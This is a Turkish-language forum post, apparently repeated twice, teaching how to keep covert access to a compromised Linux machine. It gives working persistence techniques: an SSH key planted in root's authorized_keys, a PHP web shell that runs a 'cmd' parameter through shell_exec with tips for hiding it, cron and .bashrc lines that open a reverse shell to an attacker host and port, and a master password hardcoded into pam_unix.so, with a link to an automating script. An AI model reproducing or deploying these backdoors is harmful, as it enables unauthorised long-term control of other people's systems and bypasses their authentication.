SSH Backdoors
Ssh Backdoors temelde ssh anahtarlarımızı bazı kullanıcıların home dizininde bırakmayı tercih eder.
Genellikle kullanıcı, en yüksek ayrıcalıklara sahip kullanıcı olduğu için root olur.
sh-keygen ile bir ssh anahtarı oluşturalım
Artık 2 anahtarımız var. 1 özel anahtar ve 1 genel anahtar, şimdi /root/.ssh adresine gidin ve genel anahtarı orada bırakın.
Genel anahtarı yeniden adlandırmayı unutma authorized_keys
Artık basitçe root olarak giriş yapabiliriz.
Not: Bu backdoor pek gizli sayılmaz. Yetkili kişi farkedecekdir.
PHP Backdoors
Bir Linux bilgisayarında kök erişimi elde ederseniz, büyük olasılıkla web root ve veya herhangi bir yararlı bilgiyi arayacaksınız.
Web root genellikle /var/www/html konumunda bulunur.
Bu kod basitçe "cmd" parametresini alır ve o parametreye verilen her şeyi çalıştırır.
"$ _REQUEST ['cmd'])" kullandığımıza dikkat edin; bu, bu parametreyi GET veya POST verilerinde geçirebileceğiniz anlamına gelir.
Bunu gizlemek için bir kaç öneri
Mevcut bir php dosyasına ekleme yapabilirsiniz
"cmd" parametresini başka bir şeyile değiştirin
CronJob Backdoors
Cronjob nedir
Bilgisayar işletim sistemlerinde zamana dayalı bir iş planlayıcıdır. Yazılım ortamlarını kuran ve sürdüren kullanıcılar, işleri belirli zamanlarda, tarihlerde veya aralıklarla çalışmak üzere planlamak için cron kullanır.
/etc/cronjob Dosyalarına bakın
2 harfe dikkat edin: "m ve h"
Bunlar, görevin her saat mi yoksa dakikada bir mi çalıştırılması gerektiğini gösteren harflerdir.
"h" nin altında bir "*" sembolü olduğunu görebilirsiniz. Bu, aşağıdaki görevin her saat çalışacağı anlamına gelir.
Bunu cronjob dosyasına ekleyin
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/port 0>&1'
Belirttiğiniz portu dinlemeyi unutmayın
Not: Bu backdoor pek gizli sayılmaz. Yetkili kişi farkedecekdir.
.bashrc Backdoors
Bir kullanıcının oturum açma kabuğu olarak bash varsa, etkileşimli bir oturum başlatıldığında ana dizinindeki ".bashrc" dosyası çalıştırılır.
Dolayısıyla, sistemlerinde sık sık oturum açan herhangi bir kullanıcı tanıyorsanız, shellinizi ".bashrc" dosyalarına eklemek için bu komutu çalıştırabilirsiniz.
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc
Kullanıcınızın ne zaman oturum açacağını bilmediğiniz için nc dinleyicinizin her zaman hazır olması gereklidir.
Not: bu backdoor gerçekden gizli diyebiliriz
pam_unix.so Backdoors
"Pam_unix.so" dosyasının ne olduğunu bilmiyorsanız, Linux'ta kimlik doğrulamadan sorumlu olan dosyalardan biridir.
"pam_unix.so" dosyası, kullanıcının sağladığı şifreyi doğrulamak için "unix_verify_password" işlevini kullanır.
Eklediğimi gördünüzmü?
"if (strcmp (p," 0xMitsurugi ")! = 0)"
ekran görüntüsünde "p" değişkeni ile "0xMitsurugi" dizesini karşılaştırıyoruz.
"P" değişkeni, kullanıcının sağladığı şifreyi ifade eder.
ifadenin sonunda "! = 0" görebilirsiniz. Bu, "başarılı değilse" anlamına gelir.
Dolayısıyla, "p" değişkeni (kullanıcı tarafından sağlanan parola) ve "0xMitsurugi" dizesi aynı DEĞİLSE ... "unix_verify_password" işlevi kullanılacaktır.
"p" değişkeni (kullanıcı tarafından sağlanan parola) ve "0xMitsurugi" dizesi aynıysa, kimlik doğrulama başarılıdır. Başarıyı "PAM_SUCCESS" kullanarak işaretliyoruz
bu backdoor kendi şifrenizi "pam_unix.so" dosyasına eklemekten ibarettir.
Dosyaya eklediğiniz şifreyi bildiğiniz için, şifre "pam_unix.so" dan kaldırılana kadar bu şifreyle her zaman kimliğinizi doğrulayabilirsiniz.
Bu işlemi otomatik olarak yapıcak bir script bulunmaktadır.
https://github.com/zephrax/linux-pam-backdoor
Ssh Backdoors temelde ssh anahtarlarımızı bazı kullanıcıların home dizininde bırakmayı tercih eder.
Genellikle kullanıcı, en yüksek ayrıcalıklara sahip kullanıcı olduğu için root olur.
sh-keygen ile bir ssh anahtarı oluşturalım
Artık 2 anahtarımız var. 1 özel anahtar ve 1 genel anahtar, şimdi /root/.ssh adresine gidin ve genel anahtarı orada bırakın.
Genel anahtarı yeniden adlandırmayı unutma authorized_keys
Artık basitçe root olarak giriş yapabiliriz.
Not: Bu backdoor pek gizli sayılmaz. Yetkili kişi farkedecekdir.
PHP Backdoors
Bir Linux bilgisayarında kök erişimi elde ederseniz, büyük olasılıkla web root ve veya herhangi bir yararlı bilgiyi arayacaksınız.
Web root genellikle /var/www/html konumunda bulunur.
Kod:
<? php
if (isset ($ _ REQUEST ['cmd'])) {
echo "<pre>". shell_exec ($ _ REQUEST ['cmd']). "</pre>";
}
?>"$ _REQUEST ['cmd'])" kullandığımıza dikkat edin; bu, bu parametreyi GET veya POST verilerinde geçirebileceğiniz anlamına gelir.
Bunu gizlemek için bir kaç öneri
Mevcut bir php dosyasına ekleme yapabilirsiniz
"cmd" parametresini başka bir şeyile değiştirin
CronJob Backdoors
Cronjob nedir
Bilgisayar işletim sistemlerinde zamana dayalı bir iş planlayıcıdır. Yazılım ortamlarını kuran ve sürdüren kullanıcılar, işleri belirli zamanlarda, tarihlerde veya aralıklarla çalışmak üzere planlamak için cron kullanır.
/etc/cronjob Dosyalarına bakın
2 harfe dikkat edin: "m ve h"
Bunlar, görevin her saat mi yoksa dakikada bir mi çalıştırılması gerektiğini gösteren harflerdir.
"h" nin altında bir "*" sembolü olduğunu görebilirsiniz. Bu, aşağıdaki görevin her saat çalışacağı anlamına gelir.
Bunu cronjob dosyasına ekleyin
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/port 0>&1'
Belirttiğiniz portu dinlemeyi unutmayın
Not: Bu backdoor pek gizli sayılmaz. Yetkili kişi farkedecekdir.
.bashrc Backdoors
Bir kullanıcının oturum açma kabuğu olarak bash varsa, etkileşimli bir oturum başlatıldığında ana dizinindeki ".bashrc" dosyası çalıştırılır.
Dolayısıyla, sistemlerinde sık sık oturum açan herhangi bir kullanıcı tanıyorsanız, shellinizi ".bashrc" dosyalarına eklemek için bu komutu çalıştırabilirsiniz.
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc
Kullanıcınızın ne zaman oturum açacağını bilmediğiniz için nc dinleyicinizin her zaman hazır olması gereklidir.
Not: bu backdoor gerçekden gizli diyebiliriz
pam_unix.so Backdoors
"Pam_unix.so" dosyasının ne olduğunu bilmiyorsanız, Linux'ta kimlik doğrulamadan sorumlu olan dosyalardan biridir.
"pam_unix.so" dosyası, kullanıcının sağladığı şifreyi doğrulamak için "unix_verify_password" işlevini kullanır.Eklediğimi gördünüzmü?
"if (strcmp (p," 0xMitsurugi ")! = 0)"
ekran görüntüsünde "p" değişkeni ile "0xMitsurugi" dizesini karşılaştırıyoruz.
"P" değişkeni, kullanıcının sağladığı şifreyi ifade eder.
ifadenin sonunda "! = 0" görebilirsiniz. Bu, "başarılı değilse" anlamına gelir.
Dolayısıyla, "p" değişkeni (kullanıcı tarafından sağlanan parola) ve "0xMitsurugi" dizesi aynı DEĞİLSE ... "unix_verify_password" işlevi kullanılacaktır.
"p" değişkeni (kullanıcı tarafından sağlanan parola) ve "0xMitsurugi" dizesi aynıysa, kimlik doğrulama başarılıdır. Başarıyı "PAM_SUCCESS" kullanarak işaretliyoruz
bu backdoor kendi şifrenizi "pam_unix.so" dosyasına eklemekten ibarettir.
Dosyaya eklediğiniz şifreyi bildiğiniz için, şifre "pam_unix.so" dan kaldırılana kadar bu şifreyle her zaman kimliğinizi doğrulayabilirsiniz.
Bu işlemi otomatik olarak yapıcak bir script bulunmaktadır.
https://github.com/zephrax/linux-pam-backdoor
Son düzenleme:
